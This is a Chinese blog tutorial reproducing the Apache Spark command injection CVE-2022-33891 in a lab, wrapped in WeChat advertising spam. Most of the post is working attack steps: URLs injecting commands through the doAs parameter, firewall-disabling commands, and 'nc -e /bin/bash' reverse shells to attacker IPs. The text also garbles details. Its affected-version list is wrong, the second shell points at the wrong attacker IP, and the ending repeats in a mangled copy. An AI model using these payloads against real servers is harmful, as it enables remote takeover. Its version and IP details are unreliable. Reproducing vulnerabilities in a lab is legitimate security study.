[ 漏洞复现篇 ] Apache Spark 命令注入(CVE-2022-33891)_spark漏洞

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新大数据全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注大数据)
img

正文

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、漏洞编号

CVE-2022-33891

二、影响版本

Apache spark version<=3.0.3
3.1.1=<Apache spark 版本<=3.1.2
Apache Spark version>= 3.3.0

三、环境搭建

下载编译包3.0.3版本

下载spark3.0.3编译包:

https://archive.apache.org/dist/spark/spark-3.0.3/spark-3.0.3-bin-hadoop3.2.tgz

linux直接用wget下载

wget https://archive.apache.org/dist/spark/spark-3.0.3/spark-3.0.3-bin-hadoop3.2.tgz

在这里插入图片描述
在这里插入图片描述

解压编译包:

下载编译包之后,解压编译包

tar -zxvf spark-3.0.3-bin-hadoop3.2.tgz

在这里插入图片描述

名字太长了,给他改个名字,就用mv命令改吧

mv spark-3.0.3-bin-hadoop3.2 spark-local

在这里插入图片描述

切换到解压包目录下
cd spark-local
在这里插入图片描述

执行:

启动 Apache spark 项目(需要开启spark.acls.enable)

./bin/spark-shell --conf spark.acls.enable=true

在这里插入图片描述

打开连接即可

启动服务后,会有web页面的地址,打开即可,可看上面的那张图片

http:ip:4040

在这里插入图片描述

四、代码注入漏洞复现:

复现步骤

在url后拼接如下命令即可

 ?doAs=`要执行的命令`

执行whoami

http://192.168.13.133:4040/jobs/?doAs=`whoami`

发现页面无回显,无法验证漏洞的存在,尝试创建文件来进行验证
在这里插入图片描述

创建txt文件

http://192.168.13.131:4040/jobs/?doAs=`touch%20/a.txt`

页面依然没有回显。
在这里插入图片描述

去后台查看,发现a.txt已经被创建,发现代码被成功执行,也就是说存在该漏洞。
验证了漏洞存在,我们尝试getshell

在这里插入图片描述

五、Getshell

把命令换位反弹shell命令就ok了

反弹一

nc(windows)与nc(靶机kali)的方向连接反弹shell

环境

我用本机windows攻击机攻击靶机kali
靶机kali的ip:192.168.13.131
在这里插入图片描述

Windows攻击机的ip:192.168.13.1
在这里插入图片描述

攻击机关闭防火墙
在这里插入图片描述

攻击机监听
./nc.exe -lvvp 55555

在这里插入图片描述

靶机上连接

连接命令

nc -e /bin/bash 192.168.13.1 55555

代码注入到url中进行访问

http://192.168.13.131:4040/jobs/?doAs=`nc -e /bin/bash 192.168.13.1 55555`

访问该链接,页面无回显,但是靶机已经在连接我们的攻击机了

在这里插入图片描述

反弹shell成功

查看攻击机变化,发现已经连接成功了,但是没有获取到计算机名
刚开始看到下面这个界面我还以为shell没有反弹过来,所以有了反弹二
在这里插入图片描述
在这里插入图片描述

执行ifconfig,发现正是靶机kali的ip

反弹二:

同样采用反向反向

环境

这里我把攻击机换成了同网段的另一台虚拟机centos7
靶机kali的ip:192.168.13.131
在这里插入图片描述

攻击机centos的ip:192.168.13.133
在这里插入图片描述

攻击机centos7关闭防火墙
查看防火墙状态,发现状态是“active(running)”是开启的。

systemctl status firewalld.service

在这里插入图片描述

在命令行中输入以下命令,进行关闭防火墙

systemctl stop firewalld.service。

我的centos7安装了图形化界面,需要身份认证才能完成操作
命令行界面我不太清楚要不要身份认证
在这里插入图片描述

然后再使用命令查看状态

systemctl status firewalld.service

状态为disavtive(dead)就说明防火墙已经关闭。

在这里插入图片描述

攻击机监听
nc -lvvp 44444

在这里插入图片描述

靶机连接

连接命令

nc -e /bin/bash 192.168.13.1 44444

代码注入到url中进行访问

http://192.168.13.131:4040/jobs/?doAs=`nc -e /bin/bash 192.168.13.1 44444`

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注大数据)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

-e /bin/bash 192.168.13.1 44444


代码注入到url中进行访问



http://192.168.13.131:4040/jobs/?doAs=nc -e /bin/bash 192.168.13.1 44444




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注大数据)**
[外链图片转存中...(img-cBdPa2dI-1713334065537)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值